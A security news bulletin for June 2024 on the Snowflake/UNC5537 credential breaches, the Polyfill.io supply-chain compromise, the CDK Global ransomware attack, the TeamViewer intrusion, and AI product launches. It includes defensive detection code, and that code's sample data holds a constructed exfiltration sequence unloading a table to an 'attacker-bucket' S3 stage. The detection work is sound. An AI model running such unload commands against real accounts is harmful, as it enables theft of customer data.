news · 9 min read

Bulletin — June 2024

Mandiant publishes the UNC5537 report — 165 Snowflake accounts compromised via infostealers. Polyfill.io turns out to have been bought by Funnull and serving malware since February. CDK Global pays $25M to BlackSuit after halting 15,000 dealerships. APT29 inside TeamViewer. Apple presents Private Cloud Compute at WWDC and Anthropic ships Claude 3.5 Sonnet.

· Manuel López Pérez · news

June is the month SaaS posture moves to the front. Mandiant publishes the report on UNC5537 and the Snowflake wave stops being rumour: 165 confirmed accounts, zero CVEs, all lax defaults and credentials that had been sitting in infostealer logs since 2020. In parallel, Polyfill.io turns out to have been injecting malware for months into more than 100,000 sites — the domain was sold in February to a Chinese company and nobody looked. CDK Global pays $25 million to BlackSuit and leaves 15,000 dealerships idle for two weeks. APT29 gets inside TeamViewer’s corporate network. And at the top of the stack, Apple Intelligence plus Private Cloud Compute at WWDC and Claude 3.5 Sonnet set the pace of AI in product.

UNC5537 / Snowflake — the report that names the wave

10 June. Mandiant publishes the technical report on UNC5537, the financial cluster behind the Ticketmaster (560M), Santander, Advance Auto Parts (380M), Pure Storage, LendingTree/QuoteWizard, Neiman Marcus, Cleared4 breaches and nearly 160 more organisations. Mandiant and Snowflake confirm having notified 165 entities.

The model is mundane: corporate Snowflake credentials stolen by infostealers (VIDAR, REDLINE, LUMMA, RISEPRO) between 2020 and 2024; authentication against accounts with neither MFA nor a network policy; mass exfiltration via COPY INTO @stage to attacker-controlled S3. 79.7% of the credentials used had prior exposure in public logs. Some were still valid four years after the initial theft. The actor’s own tool, FROSTBITE (also visible as application_name = rapeflake in query history), automates reconnaissance.

We’ve published the technical analysis of the flow and the mitigations. The short reading: Snowflake doesn’t have a bug, it has defaults that for years allowed password-only authentication from any IP. In September the company announces MFA by default for new accounts created from October. Existing accounts can still opt out — the work of auditing and rotating inherited credentials falls to customer CISOs.
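The three signals described above (password-only logins from outside the corporate ranges, sessions from the FROSTBITE client, and COPY INTO unloads to an external stage), as an added detection example that is not part of the original post or of Mandiant’s report. The rows are constructed; column names follow Snowflake’s ACCOUNT_USAGE views (LOGIN_HISTORY, SESSIONS, QUERY_HISTORY) as an assumption about their schema, and the allowlist prefix is invented.

```python
import re

# Constructed sample rows (not real logs). Column names mirror the ACCOUNT_USAGE
# views as an assumption; adapt them to the export you actually have.
LOGIN_HISTORY = [
    {"event_timestamp": "2024-04-14T03:12:00", "user_name": "ETL_SVC", "session_id": 1,
     "client_ip": "203.0.113.44", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": None, "is_success": "YES"},
    {"event_timestamp": "2024-04-14T09:00:00", "user_name": "ANA_LOPEZ", "session_id": 2,
     "client_ip": "198.51.100.7", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": "DUO_PUSH", "is_success": "YES"},
    {"event_timestamp": "2024-04-14T03:15:00", "user_name": "ETL_SVC", "session_id": 3,
     "client_ip": "203.0.113.44", "first_authentication_factor": "PASSWORD",
     "second_authentication_factor": None, "is_success": "NO"},
]
SESSIONS = [
    {"session_id": 1, "user_name": "ETL_SVC", "client_application_id": "rapeflake"},
    {"session_id": 2, "user_name": "ANA_LOPEZ", "client_application_id": "Snowsight"},
]
QUERY_HISTORY = [
    {"session_id": 1, "user_name": "ETL_SVC",
     "query_text": "CREATE STAGE exfil_stage URL='s3://attacker-bucket/dump/'"},
    {"session_id": 1, "user_name": "ETL_SVC",
     "query_text": "COPY INTO @exfil_stage/out FROM (SELECT * FROM CUSTOMERS)"},
    {"session_id": 2, "user_name": "ANA_LOPEZ",
     "query_text": "COPY INTO CUSTOMERS FROM @internal_stage"},  # a load, not an unload
]
CORPORATE_PREFIXES = ("198.51.100.",)  # constructed allowlist of corporate egress ranges

def password_only_logins(rows, allowed_prefixes=CORPORATE_PREFIXES):
    """Successful logins with a password and no second factor, from outside the allowlist."""
    return [r for r in rows
            if r["is_success"] == "YES"
            and r["first_authentication_factor"] == "PASSWORD"
            and not r["second_authentication_factor"]
            and not r["client_ip"].startswith(allowed_prefixes)]

def frostbite_sessions(rows):
    """Sessions whose client application name carries the FROSTBITE marker from the report."""
    return [r for r in rows if "rapeflake" in (r.get("client_application_id") or "").lower()]

EXTERNAL_STAGE = re.compile(r"URL\s*=\s*'(s3|gcs|azure)://", re.I)
UNLOAD = re.compile(r"^\s*COPY\s+INTO\s+@", re.I)   # COPY INTO @stage = unload to a stage

def suspicious_unloads(rows):
    """Unloads to a stage issued in a session that also created an external (cloud URL) stage."""
    external_sessions = {r["session_id"] for r in rows if EXTERNAL_STAGE.search(r["query_text"])}
    return [r for r in rows
            if UNLOAD.match(r["query_text"]) and r["session_id"] in external_sessions]
```

Any hit on the first check is already a policy gap regardless of the other two: a password-only login from an unexpected IP means the account has neither MFA enforced nor a network policy.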

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion

Polyfill.io — the CDN that had been serving malware for months

25 June. Sansec publishes the warning: cdn.polyfill.io, the library that fills in missing APIs for old browsers and is embedded in hundreds of thousands of sites, has been serving malicious JavaScript to mobile devices since February. The chain: on 24 February Funnull, a Chinese company, acquires the polyfill.io domain and the GitHub account. The original author, Andrew Betts, warns on X (“I never owned the domain and had no influence over the sale”) and recommends removing the inclusion. Almost nobody does.

The payload serves conditional redirects: if the user agent is mobile, the fingerprint doesn’t mark the visit as a suspicious session and no devtools are open, the script rewrites navigation toward scam and malvertising destinations. Censys counts 384,773 hosts with the script linked in July, including public domains of WarnerBros, Hulu, Mercedes-Benz, JSTOR, Intuit and the World Economic Forum.

Cloudflare and Fastly respond by setting up clean mirrors for customers that don’t migrate in time. Namecheap pulls the domain. The original library had active maintenance from Andrew Betts until 2023; the pattern is the classic one: acquisition of a popular package or domain, low post-sale vigilance, and four months of monetisation before an external researcher (Sansec) catches it.

Reading for 2024: any <script src="https://cdn.<vendor>/..."> that is neither self-hosted nor pinned with SRI (an integrity hash) is a supply chain delegated to the lifecycle of a domain you don’t control.
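The audit that sentence implies, as an added example that is not part of the original post: list third-party script tags with no integrity attribute, and compute or verify the SRI value for a script body. The HTML fragment, the script body and the own-host set are constructed.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment: a polyfill.io-style include with no SRI, a third-party
# include that is pinned, and a same-origin include.
SAMPLE_HTML = """
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="https://cdn.example-vendor.net/lib.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="/static/app.js"></script>
"""
OWN_HOSTS = {"www.example.com"}  # constructed: hosts whose content you control

class ScriptCollector(HTMLParser):
    """Collects the attribute dicts of every <script> start tag."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))

def unpinned_third_party_scripts(html, own_hosts=OWN_HOSTS):
    """src URLs served from a host you don't control and carrying no integrity attribute."""
    parser = ScriptCollector()
    parser.feed(html)
    out = []
    for s in parser.scripts:
        host = urlparse(s.get("src", "")).hostname   # None for relative (same-origin) URLs
        if host and host not in own_hosts and not s.get("integrity"):
            out.append(s["src"])
    return out

def sri_value(body: bytes, algo: str = "sha384") -> str:
    """The integrity attribute value for a script body: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

def sri_matches(body: bytes, integrity: str) -> bool:
    """True if any space-separated token in `integrity` matches the body (browser semantics)."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in ("sha256", "sha384", "sha512") and sri_value(body, algo) == token:
            return True
    return False
```

SRI makes a browser refuse a script whose bytes no longer match the pin, which is exactly what a post-sale payload swap produces; the caveat is that polyfill.io built its bundle per user agent by design, so its responses could never be pinned, and self-hosting was the only safe option there.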

Source: https://sansec.io/research/polyfill-supply-chain-attack · Censys: https://censys.com/blog/july-2-polyfill-io-supply-chain-attack-digging-into-the-web-of-compromised-domains/

CDK Global — ransomware that halts 15,000 dealerships

18-19 June. CDK Global, SaaS provider of Dealer Management Systems for car dealerships in North America, suffers two consecutive attacks attributed to BlackSuit (an offshoot of Royal, itself an offshoot of Conti). The first lands on the night of the 18th and forces CDK to shut down its two data centres at 02:00 ET on the 19th; the second arrives during restoration. 15,000 dealerships are left without sales, financing, registration or service operations. Lithia, Penske, Group 1 Automotive and Sonic Automotive report the impact in their 8-K filings to the SEC.

The initial demand is $10M. It rises to $50M. On 21 June, a wallet linked to BlackSuit receives 387 bitcoin ($25M). CDK doesn’t officially confirm payment; CNN and CyberScoop trace the transaction. Full restoration on 4 July. Anderson Economic Group estimates the cost to dealerships at more than $1 billion accumulated during the outage.

The operational lesson: a sector-specific SaaS vendor with a functional monopoly (a DMS can’t be replaced in a week) is a single point of failure for an entire industry. BlackSuit had done the same with Change Healthcare in February. The pattern works, so other operators will copy it.

Source: https://cyberscoop.com/cdk-ransom-blacksuit-25-million/

TeamViewer — APT29 inside the corporate network

26-28 June. TeamViewer detects anomalous activity on the 26th, contains it, and publishes its disclosure on the 28th. It attributes the intrusion to APT29 / Midnight Blizzard (Russian SVR). Initial vector: a standard employee account, stolen via credential stuffing or reuse. The actor only accesses the corporate IT network — not the product environment, not customer infrastructure. TeamViewer emphasises that the segmentation between corporate IT and the product environment held.

Compromised data: names, corporate contact data and encrypted employee passwords. No customer data, no product telemetry, no remote session data. TeamViewer coordinates with Microsoft to mitigate the risk from the stolen passwords.

APT29 gets into TeamViewer a month after appearing in the SolarWinds-CTI logs reviewed by Microsoft, and months after hitting Microsoft itself (January, Midnight Blizzard against executives via OAuth abuse) and HPE (May). The group is active and operates against any vendor with a high-trust footprint in enterprise customers.

Source: https://www.teamviewer.com/en/resources/trust-center/statement/ · coverage: https://www.bleepingcomputer.com/news/security/teamviewers-corporate-network-was-breached-in-alleged-apt-hack/

Apple Intelligence + Private Cloud Compute — WWDC

10 June. Apple announces Apple Intelligence in the WWDC keynote. On-device model for local tasks (summarisation, rewriting, Genmoji image generation), larger model on server for inference that doesn’t fit locally. The server, Private Cloud Compute (PCC), is the interesting piece from a security angle.

The design Apple publishes: PCC nodes built on Apple silicon, a reduced OS with no shell or remote management capability, cryptographic attestation of the binary running on each node, and an immutable audit log. The client encrypts the request with the public key of a PCC node it has previously verified; Apple claims to have no access to the request or the result. Detailed reading on the technical blog.

The security claims are ambitious — the threat model includes “Apple insider trying to access a user’s requests”. Independent verification remains pending. In July Apple opens a specific bug bounty for PCC with payouts up to $1M.

The contrast with Recall (May, pulled on 7 June after pressure from Beaumont and Forshaw) is deliberate: Apple presents the threat model before the product. Microsoft presented it after.

Source: https://security.apple.com/blog/private-cloud-compute/

Claude 3.5 Sonnet — Anthropic picks up the pace

20 June. Anthropic ships Claude 3.5 Sonnet — mid-tier of the 3.5 family that, per the published benchmarks, beats Claude 3 Opus at half the cost. Available on Claude.ai for free, in API, Bedrock and Vertex AI. 200k token window. $3 / $15 per million input/output tokens.

The interest for security isn’t in the model itself (it’s general purpose, with no new security-relevant capabilities) but in the pace. Three months after Claude 3 (4 March), Anthropic ships an iteration that on internal metrics beats the large model. That implies the cadence of adversarial evaluation (internal red team, safety benchmarks) has to follow the same pace. System prompts and safety classifiers tuned to Claude 3 Opus don’t apply as-is to 3.5 Sonnet, and the difference shows in the jailbreak rate with known techniques (many-shot, ArtPrompt).

Source: https://www.anthropic.com/news/claude-3-5-sonnet

Rest of the month

  • Microsoft Recall rollback — 7 June. Microsoft announces Recall will no longer be on by default on the Copilot+ PCs shipping on 18 June. It moves to preview on Windows Insider, requires Windows Hello to enable, adds SQLite encryption with just-in-time decryption, and makes the feature opt-in. The timeline matches the two weeks following Kevin Beaumont’s and James Forshaw’s technical analyses — we’ve covered the case in the May technical post.
  • AT&T Snowflake-related — partial disclosure in June, full on 12 July. AT&T notifies the SEC that call metadata for approximately 110 million customers was exfiltrated from a Snowflake account. Same UNC5537 pattern — no MFA, no network policy. Disclosure delayed with DoJ authorisation for “national security reasons”.
  • LA County Department of Public Health — 17 June disclosure. Phishing against 53 employees in February (compromise on 19-20 February) exposes medical data for 200,000+ people — diagnoses, prescriptions, social security numbers. The attackers access the mailboxes via credentials stolen on a fake landing page. Late disclosure: 4 months between incident and notification.
  • CVE-2024-29849, Veeam Backup Enterprise Manager — advisory 21 May, public exposure in June. Auth bypass in the Backup Enterprise Manager web interface (CVSS 9.8): a remote attacker authenticates as any user without credentials. Sina Kheirkhah publishes a technical writeup and PoC. Patch: 12.1.2.172. No confirmed mass exploitation at June close, but Veeam is a high-value target for ransomware (access to backups = erase the insurance).
  • Pure Storage breach — confirmation 11 June. Pure Storage confirms the compromise of its Snowflake account. Customer telemetry data (configuration, hostnames, no end-customer data). Another thread of the UNC5537 tangle.
  • Additional technical bulletins not developed in this post: ServiceNow CVE-2024-4879 + CVE-2024-5217 (input validation + Jelly templating, public exploitation in July), VMware ESXi CVE-2024-37085 (Microsoft ID, AD integration auth bypass used by ransomware).

Pattern of the month

June is the month the operational debate shifts. Through 2023 and the first months of 2024 the conversation about big breaches turned on CVEs in edge appliances (Ivanti, Citrix, Palo Alto, MOVEit). In June 2024 the two events of the month, Snowflake and CDK, have no associated CVE. The first is SaaS posture: lax defaults for years plus infostealers that have been running on enterprise endpoints since 2020. The second is vendor concentration: a sector-specific SaaS provider falling and paralysing an entire industry.

Polyfill.io adds a third layer: external dependency supply chain, where the compromise vector is neither a bug nor a default, it’s the change of ownership of a domain nobody monitors. Funnull buys in February, serves malware for four months, an external team (Sansec) catches it almost by accident.

The three lessons cost more than patching an appliance: they require inventorying years-old credentials, evaluating vendor concentration, and auditing external dependencies with SRI or self-hosting. Defence in 2024 stops being a patch cycle and starts looking like a supply chain audit.

July brings CrowdStrike (the technical event of the year) and regreSSHion. See you in 30 days.
